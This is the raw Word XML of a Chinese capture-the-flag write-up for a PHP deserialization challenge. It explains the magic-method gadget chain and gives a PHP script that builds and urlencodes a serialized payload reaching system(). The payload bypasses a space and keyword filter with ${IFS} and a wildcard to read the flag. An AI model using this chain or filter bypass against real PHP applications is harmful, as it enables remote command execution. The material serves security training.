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F4207">
      <w:pPr>
        <w:spacing w:before="60" w:after="0" w:line="288" w:lineRule="auto"/>
        <w:jc w:val="both"/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</w:pP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【请分步骤详细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给出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题目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的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解题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过程，每一步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应有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截图和详细的文字说明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，保证可以复现，所有需要用到的工具、文件等资源需要放在《解题文档》同文件夹中或给出下载链接】</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15133461">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="60" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="both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考点是php反序列化，了解几个魔术方法的触发条件就行，然后从sink点开始往回推导，从sink开始写代码</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2427F18F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="60" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="both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执行命令时，考察空格绕过，命令绕过，空格可以用${IFS}绕，flag可以用通配符绕</w:t>
      </w:r>
      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="0"/>
    </w:p>
    <w:p w14:paraId="3FD5E58D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1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直接看脚本</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D9D516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ascii="Segoe UI" w:hAnsi="Segoe UI" w:eastAsia="Segoe UI" w:cs="Segoe UI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&lt;?php</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F2C05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18401"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:bdr w:val="none" w:color="auto" w:sz="0" w:space="0"/>
          <w:shd w:val="clear" w:fill="F8F8F8"/>
        </w:rPr>
        <w:t>bits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{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="659F91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$cmd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"tac\${IFS}/fla?"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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D2683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private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$username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"1diot9"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 w14:paraId="15E6F41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$password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"BITs2CTF"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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14781E6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3C3516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function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__invoke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(){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0231CC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if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($this-&gt;username ==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"1diot9"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&amp;&amp; $this-&gt;password ==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"BITs2CTF"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){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AA7CB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(!preg_match(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"/ |cat|less|more|head|tail|flag/"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,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$this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-&gt;cmd)) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FA444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echo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"\n"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 w14:paraId="47518B3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system(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$this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-&gt;cmd);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E105D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}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else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{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BE203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    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die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"不要输入奇怪的命令！"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);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B222F7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}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F38B0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}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else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{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12ED64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echo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"就差一点了"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 w14:paraId="153271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}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AC85D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}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0502C04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}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7706EC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65CD31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18401"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:bdr w:val="none" w:color="auto" w:sz="0" w:space="0"/>
          <w:shd w:val="clear" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>CTF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{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24D959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$func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"unser"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 w14:paraId="519A3F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4B9661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function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8F8F8"/>
        </w:rPr>
        <w:t>__set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(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$a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,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$b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){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72476D6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$method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= $this-&gt;func;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5969AD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$method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();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="001B26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}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F58619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3651ABC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function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unser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(){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B1258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echo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"你快学会php反序列化了"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 w14:paraId="3CDAD8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}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="496B59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}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="591EF9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0835D4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18401"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:bdr w:val="none" w:color="auto" w:sz="0" w:space="0"/>
          <w:shd w:val="clear" w:fill="F8F8F8"/>
        </w:rPr>
        <w:t>anything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{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B2B48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$var1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"aaa"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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36D952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$var2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 w14:paraId="5001DA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02E870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function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8F8F8"/>
        </w:rPr>
        <w:t>__toString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(){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36BA0F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$this-&gt;var2-&gt;sec = $this-&gt;var1;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="670B2C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return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8F8F8"/>
        </w:rPr>
        <w:t>"anything"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 w14:paraId="3457CA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}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A8250C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}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="603CD6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2ABE75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18401"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:bdr w:val="none" w:color="auto" w:sz="0" w:space="0"/>
          <w:shd w:val="clear" w:fill="F8F8F8"/>
        </w:rPr>
        <w:t>endpoint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{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18D409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$bits2ctf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"welcome to bits2ctf!"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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="004A8A0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function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8F8F8"/>
        </w:rPr>
        <w:t>__destruct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(){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34F36F2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      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echo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$this-&gt;bits2ctf;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C2EF6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   }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="679617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}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="647CBE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1229BF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$bits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bits();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64564DB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$ctf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new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CTF();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="577A1C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$ctf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-&gt;func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$bits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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AB619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$any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new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anything();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5668DF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$any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-&gt;var2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$ctf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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40667B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$end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new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endpoint();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40450E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$end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-&gt;bits2ctf =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$any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;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="359818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</w:p>
    <w:p w14:paraId="25440D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$ser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= serialize(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$end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);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BB6AE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8F8F8"/>
        </w:rPr>
        <w:t>//unserialize($ser);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5866C7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$ser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 = urlencode(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FFFFF"/>
        </w:rPr>
        <w:t>$ser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FFFFF"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="686FDB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color w:val="5C5C5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8F8F8"/>
        </w:rPr>
        <w:t>echo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8F8F8"/>
        </w:rPr>
        <w:t>$ser</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:eastAsia="Segoe UI" w:cs="Segoe UI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  <w:shd w:val="clear" w:fill="F8F8F8"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79BF28E7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</w:p>
    <w:sectPr>
      <w:headerReference r:id="rId5" w:type="even"/>
      <w:pgSz w:w="11907" w:h="16839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AAF24">
    <w:pPr>
      <w:pStyle w:val="11"/>
      <w:framePr w:wrap="around" w:vAnchor="text" w:hAnchor="margin" w:xAlign="right" w:y="1"/>
      <w:rPr>
        <w:rStyle w:val="16"/>
        <w:rFonts w:hint="eastAsia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end"/>
    </w:r>
  </w:p>
  <w:p w14:paraId="599DA7A8">
    <w:pPr>
      <w:pStyle w:val="11"/>
      <w:ind w:right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1CA2E7"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="E71CA2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1138B8F"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="51138B8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549"/>
    <w:rsid w:val="00115549"/>
    <w:rsid w:val="00147B03"/>
    <w:rsid w:val="001C2C1B"/>
    <w:rsid w:val="002263EB"/>
    <w:rsid w:val="005653F1"/>
    <w:rsid w:val="00761E0D"/>
    <w:rsid w:val="0088793F"/>
    <w:rsid w:val="009C0ECB"/>
    <w:rsid w:val="00C63219"/>
    <w:rsid w:val="00D6516E"/>
    <w:rsid w:val="00F03878"/>
    <w:rsid w:val="00FE27F5"/>
    <w:rsid w:val="00FE336F"/>
    <w:rsid w:val="0D2C3DB9"/>
    <w:rsid w:val="5C8F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0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0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unhideWhenUsed/>
    <w:qFormat/>
    <w:uiPriority w:val="0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nhideWhenUsed/>
    <w:qFormat/>
    <w:uiPriority w:val="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0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semiHidden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page number"/>
    <w:basedOn w:val="15"/>
    <w:uiPriority w:val="0"/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5"/>
    <w:link w:val="11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</Words>
  <Characters>330</Characters>
  <Lines>2</Lines>
  <Paragraphs>1</Paragraphs>
  <TotalTime>6</TotalTime>
  <ScaleCrop>false</ScaleCrop>
  <LinksUpToDate>false</LinksUpToDate>
  <CharactersWithSpaces>343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2025-05-18T19:12:00Z</dcterms:created>
  <dc:creator>1diOt9</dc:creator>
  <cp:lastModifiedBy>1diOt9</cp:lastModifiedBy>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-09-16T11:05:00Z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eyJoZGlkIjoiMGU4NDRkYjAzMTAyMmY2ODg3ZDJlODA4MGJiNzE2Y2QiLCJ1c2VySWQiOiIxMzMwMTM0Mzc5In0=</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="3" name="KSOProductBuildVer">
    <vt:lpwstr>2052-12.1.0.22529</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="4" name="ICV">
    <vt:lpwstr>DD847728023A4AC0BA0161D511314C1A_12</vt:lpwstr>
  </property>
</Properties>
</file>